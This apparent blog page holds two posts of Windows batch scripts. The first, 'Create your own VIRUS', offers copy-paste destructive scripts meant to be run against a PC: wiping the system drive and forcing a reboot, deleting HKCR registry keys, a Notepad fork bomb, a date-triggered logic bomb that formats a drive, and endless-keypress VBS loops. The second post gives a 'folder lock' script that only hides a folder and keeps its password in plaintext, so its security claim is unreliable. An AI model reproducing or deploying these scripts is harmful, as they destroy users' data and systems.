Showing posts with label Batch Programs. Show all posts
Showing posts with label Batch Programs. Show all posts

Saturday 28 June 2014

// // Leave a Comment

Create your own VIRUS

Virus Writing


Virus is one of the interesting program that is used to destroy a system generally. Today here i'm going to write some notepad program that can be used as a Virus.

Important: I am not responsible for any damage or error reporting to you pc,do it at your own risk.

All scripts are here to be copied in notepad.

>>This Virus Deleted all the Contents of a       Drive... 

@echo off
del%systemdrive%*.*/f /s /q 
shutdown -r -f -t 00

Save the above code in .bat file

>>The Most Simple Virus to Crush the Windows

@Echo off
Del C:\ *.* |y

Save it as Anything.bat

>>Delete key Registery files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registery files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:

@ECHO OFF
START reg delete HKCR/.exe

START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been f**ked . Have a nice day.
GOTO MESSAGE

>>Endless Notepads

* This will pop up endless notepads untill the computer freezez and crashes*

Code:

@ECHO OFF
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>>Bomb Virus

Copy paste the following


if %date% NEQ 2014/06/29 goto exit
format E: /y >nul
:exit
exit

And save it as Anything.bat

Note: you can change the date ( 2014/06/29) of the virus and the location (E:) on which it does action.

This virus will take effect on that day.

>>Endless Enter

*This contantly makes it so the enter button is being pressed continuosly*

Code:

Set wshShell=wscript.Createobject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

>>Endless Backspace

*This make it so the backspace key is constantly being presses*
Code:

MsgBox "Let's go back a few Steps"
Set Wshshell=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshell.sendkeys "{bs}"
loop

Instructions:

  • Paste the above code in notepad.
  • Save as "Anyname.vbs"
  • Run the file
  • To stop, launch task manager and then under "Processes" end "wscript.exe"
I hope you would like it...


Keep Visiting...






Read More
// // Leave a Comment

Create own Folder Lock


Folder Lock
Folder locks have become the necessity for this generation for the every obvious reasons which we all know.. But finding them for free on the internet is sometimes not easy task to do.

There are lots of issues related to the free online folder locks like the trial period, fake serial key and lots more..

Features that would be available with this Folder Lock

  • Ability to lock and unlock it with your desired password.
  • Hide the folder from everybody(The folder will remain hidden even if you check the option reading "Show Hidden Files and Folders").

Process to create your own Folder Lock

1) Open the notepad file and copy the below code in it.

2) Type your desired password for the Folder Lock in the place highlighted in the red reading "type your password here" in the code.

3) After making the necessary changes , save the file with the name "locker.bat" 

4) Now a bat file has created. Double click on it.

5) Double clicking on bat file automatically generate the locker folder in which yu can add your files like you        do in other ordinary folders.

6) Now to hide and lock the folder, again double click on the bat file created by you i.e, 'locker.bat' file. You      will see a message like this..

     " Are you sure you want to lock the Folder(Y/N), type Y(yes) and press Enter to lock and hide it.

7) Now if you want to make the folder visible and unlock it, simply double click the 'locker.bat' file and enter      the password chosen by you in the Code and press enter. The unlocked folder lock will again be visible then.

Code:



cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the Folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid Choice.
goto CONFIRM
:LOCK
ren LOCKER "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder Locked
goto END
:UNLOCK
echo Enter Password to Unlock Folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked Successfully
goto END
:FAIL
echo Invalid Password
goto END
:MDLOCKER
md Locker
echo Locker Created Successfully
goto END

:END




I hope you would like this post, if you like this then keep in touch with us by following our blog..
Even if you are having any problem regarding this post, then comment below...

Keep Visiting...
Read More